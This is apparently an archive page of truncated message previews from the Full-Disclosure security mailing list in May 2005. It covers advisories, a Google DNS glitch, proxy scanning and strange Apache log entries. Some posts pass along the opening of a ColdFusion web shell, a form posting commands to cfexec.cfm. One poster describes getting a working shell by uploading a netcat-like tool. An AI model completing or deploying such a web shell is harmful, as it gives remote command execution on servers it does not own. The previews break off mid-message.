Dear list,
for your information:
The Common Announcement Interchange Format (CAIF) specification version
1.2 has been released.
A new version of the draft, reflecting all the changes made has been
released too.
All relevant documents are available from the CAIF home page.
CAIF Home:
h
Hi fatb,
from securiteam web site :
< html>
< body>
< cfoutput>
< table>
< form method="POST" action="cfexec.cfm">
< tr>
< td>Command:
< td> < input type=text name="cmd" size=50< cfif isdefined("form.cmd")>
value="#form.cmd#" > < br>
< tr>
< td>Options:
< td> < input type=text name="o
Hi fatb,
this is from mailing of securiteam. Try it.
ColdFusion Web Shell
SUMMARY
DETAILS
The following source code will generate a web based shell whenever it is
executed under the ColdFusion environment.
Tool sou
Hi
FYI: I have disabled monthly password reminders due to the increasing
problem of archive sites storing them verbatim without filtering.
Anyone running such an archive is encouraged to change their password
if necessary.
A password reminder is always available via the web interface in any
case
marketing is a "wonderful" thing.
On 5/10/05, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote:
> On Tue, 10 May 2005 02:32:41 BST, James Tucker said:
> > Surely this kind of message is a really bad idea.
>
> You know it, I know it, and the A/V vendors know it.
>
> > What is the possible true busines
thx :)
the script from securiteam was from Kurt Grutzmacher originally,it could not
run in my box
and Im successful got a working shell by uploading a nc like tool and use the
following script to run it
no matter how,I thought many guys who like me need a working cf
webshell,beca
thx :)
the script from securiteam was from Kurt Grutzmacher originally,it could not
run in my box
and Im successful got a working shell by uploading a nc like tool and use the
following script to run it
no matter how,I thought many guys who like me need a working cf
webshell,beca
You may or may not know that Windows applications often use the registry to
store information about where to find applications within their file
system. Due to the way in which Windows handles filenames, situations
where this information is stored in an unquoted
fashion, can leave the application o
Interesting. Has this always been that way? While it's not a huge gaping hole, it's definitely concerning. At least to me.
Steve
-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of pretty vacant
Sent: Tuesday, May 10, 2005 9:53 AM
To: James Tucker
Cc: full-
Hi list,
Is there any tool (win32 and/or unix) to scan through socks or proxy?
Googling gives no significant results...
__
http://teokolo.altervista.org
6X velocizzare la tua navigazione a 56k? 6X Web Accel
What are you trying to scan? Some tools have proxy support and some
don't. Then you can run Proxyrama, A4Proxy, SocksChain, etc, etc.
> -Original Message-
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED] On Behalf
> Of Matteo Giannone
> Sent: Tuesday, May 10, 2005 9:49 AM
> To: ful
Heads Up
http://www.mozilla.org/security/announce/mfsa2005-42.html
smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secu
On Mon, May 09, 2005 at 03:08:33PM -0700, Eric Paynter wrote:
> IE 6.x has had 80 advisories, of which 42% (34 advisories) were rated
if memory serves me right, some windoze service packs drastically changed the
behaviour of some private pages and emails, so number of advisories != number
of fixed
wtf??? - - - - this HAS BEEN PATCHED
no "heads-up" needed ( you missed the boat by a week )
BUT THANKS FOR PLAYING!
- Original Message -
From: "P Ellison" <[EMAIL PROTECTED]>
To:
Sent: Tuesday, May 10, 2005 9:21 AM
Subject: [Full-disclosure] Firefox & Mozilla Advisory
__
Well, the patch the mozilla server was modified to fix the issue. Paul
told everyone the whole story about it on here yesterday. I heard about
this on the weekend.
I am surprised no one has talked about the Google DNS issue. Users were
tricked into going to SoGoSearch.com because of IE's great dom
###
Luigi Auriemma
Application: Zoidcom
http://www.zoidcom.com
Versions: <= 1.0 beta 4
Platforms:Windows and Linux
Bug: access to unallocated memory
Exploitation: remo
Engadget.com was claiming (incorrectly) that google got hacked
http://64.233.167.104/search?q=cache:aAAhpPYRP5cJ:www.engadget.com/entry/1234000610042620/+engadget+google+hacked&hl=en
Didn't take long for baseless speculation!
Todd Towles wrote:
Well, the patch the mozilla server was modified to f
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200505-07
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200505-08
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -
Mary Landesman wrote:
I find security in understanding how best to secure a browser, rather than
switching to whichever one advertises the least vulnerabilities regardless
of how open that interpretation might be.
My point is that crunching numbers reveals different results, depending
solely on the
Is there any tool (win32 and/or unix) to scan through socks or proxy?
Googling gives no significant results...
Sockscap (win32) will forward all normal tcp/udp traffic via a SOCKS5 proxy.
www.socks.permeo.com/Download/SocksCapDownload/index.asp
Cheers,
~Mike.
___
I'm sorry for being such a bastard. After looking more
into this guy's site, it looks pretty sweet.
d.
--- Day Jay <[EMAIL PROTECTED]> wrote:
> Jesus H. Christ!
>
> I never "claimed" to be a master at c coding or
> being
> the greatest like this guy did and he *still*
> hardcoded his shit and he'
I was just taking a guess at what could have happened. But it sounds
like it would work. You buy www.google.com.net and then you wait for
their DNS to mess up and you get thousands and thousands of hits to your
spyware site. Possible Passive Pharming attack?
Anyone know for sure what happen?
> -
Your guess is probably correct - and The Register reports about the same:
http://www.theregister.co.uk/2005/05/09/google_dns_glitch/
Todd Towles wrote:
I was just taking a guess at what could have happened. But it sounds
like it would work. You buy www.google.com.net and then you wait for
their DNS
ThinkSECURE's AIRRAID WIRELESS HACKING EVENT
SUNTEC CONVENTION CENTRE, SINGAPORE
AUG 26TH 2005 (TOURNAMENT)
AUG 27TH 2005 (OPENHACK)
Official Event Website: http://airraid.securitystartshere.net
Air Raid: (noun) An attack by military aircraft, especially when
armed with bombs and rockets; a
hi all;
this my first post in this mailing list;so please ...
i am doing same pen-tests ,to apply the bit of theorical knowledge i
have ,and nessus show me same 'Critical' vulnerabilities:
sendmail 8.8
(http://www.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21950)
and php older than 3.0.1
I totally agree with Barry. What a pathetic attempt... what for. Spyware
and viri were one of the reason to switch to linux for me. I think it's
kinda sad seeing people here wasting their time trying to code spyware
for linux/unix. Get a life and do something constructive.
my2bits
me
bkfsec wrot
Hello together
Since some weeks we have an intruder which is exploiting us and poisoning us
with the Virus Unix/RST.A
I found now how it happens at it isn't clear to me what he is doing.
I found in the apache log file some interesting strings.
Repeating entries as this
ip-hide - - [10/May/2005:19:5
--On Tuesday, May 10, 2005 11:57:40 PM +0200 Adrian Senn <[EMAIL PROTECTED]>
wrote:
Since some weeks we have an intruder which is exploiting us and poisoning
us
with the Virus Unix/RST.A
I found now how it happens at it isn't clear to me what he is doing.
I found in the apache log file some intere
Thank to you for tell us.
~pingywon
- Original Message -
From: "migalo digalo" <[EMAIL PROTECTED]>
To:
Sent: Tuesday, May 10, 2005 5:50 PM
Subject: [Full-disclosure] sendmail exploit
hi all;
this my first post in this mailing list;so please ...
i am doing same pen-tests ,to apply t
Steven Rakick wrote:
> Interesting. Has this always been that way? While it's not a huge gaping
> hole, it's definitely concerning. At least to me.
Well, yes, of course it's concerning...
If you have some unknown/unwanted/etc program running on one of your
machines you darn well should be conce
Title: Guestbook PRO
Vulnerability discovery: SoulBlack - Security Research -
http://soulblack.com.ar
Date: 10/05/2005
Severity: Medium. defacement website
Affected version: <
It's not the traditional honeypot...but it is.
Welcome to the Hack www.banneretcs.com Contest!
Starting May 2nd and going until June 8th, the server located at
www.banneretcs.com will welcome hackers to attack it. If you can
deface the web site or capture the "hidden" document, you win an X
Firefox was safe(r) for a time, now exposure has driven it to become a
viable and "timeworthy" market for the spyware and malware
communities. The same will come of operating systems and any other
highly pervasive applications.
On 5/10/05, me <[EMAIL PROTECTED]> wrote:
> I totally agree with Barry
May I ask what web browser you use, if any?
What about mail client?
Do you read rich text and html mails in code?
Do you never have to update your software?
Can you reliably justify rolling out new software versions to
massively time-dependant and business critical systems potentially
causing as mu
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandriva Linux Security Update Advisory
___
Package name: ethereal
Advisory ID:
On Tue, 10 May 2005 14:50:21 PDT, migalo digalo said:
> have ,and nessus show me same 'Critical' vulnerabilities:
> sendmail 8.8
> (http://www.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21950)
Hint: First figure out why Nessus claimed it saw a Sendmail 8.8 - because
that's well and truly
I found some strange stuff on my apache logs. Wanted to know if any of
you guys has any idea of what it is:
(this is weird)
127.0.0.1 - - [13/Apr/2005:10:34:00 +1000] "\x1b[A" 501 214 "-" "-"
(and this comes from my internal network)
192.168.0.251 - - [09/May/2005:15:36:13 +1000] "\x03" 501 212
bad nic, network cable, or router? strange packets come up when that's going
on, which leads to wierd requests such as that...
On Tuesday 10 May 2005 22:31, Julio Cesar Ody sat at a computer terminal and
banged out madly:
> I found some strange stuff on my apache logs. Wanted to know if any of
>
On Wed, 11 May 2005 13:31:02 +1000, Julio Cesar Ody said:
> 127.0.0.1 - - [13/Apr/2005:10:34:00 +1000] "\x1b[A" 501 214 "-" "-"
Esc bracket A. Looks almost like somebody did a 'telnet localhost 80'
to do a manual GET for testing, and forgot that arrow keys don't work in
that environment... ;)
>
On Wed, 11 May 2005 09:09:36 +1000, Luke Skywalker said:
> Starting May 2nd and going until June 8th, the server located at
> www.banneretcs.com will welcome hackers to attack it. If you can
> deface the web site or capture the "hidden" document, you win an X-box!
OK, who's got a 0-day they're wi
On Tue, 2005-05-10 at 17:04 -0500, Paul Schmehl wrote:
> SecFilterSelective THE_REQUEST "ip-hide" would stop this attack cold.
Paul, I think Adrian put "ip-hide" in there to mask his server's IP
address in the log. It's not part of the web request the external party
made.
Cheers,
Frank
signatu
===
Ubuntu Security Notice USN-124-1 May 11, 2005
mozilla-firefox, mozilla vulnerabilities
CAN-2005-1153, CAN-2005-1154, CAN-2005-1155, CAN-2005-1156,
CAN-2005-1157, CAN-2005-1158, CAN-2005-1160
==
43 matches
Mail list logo
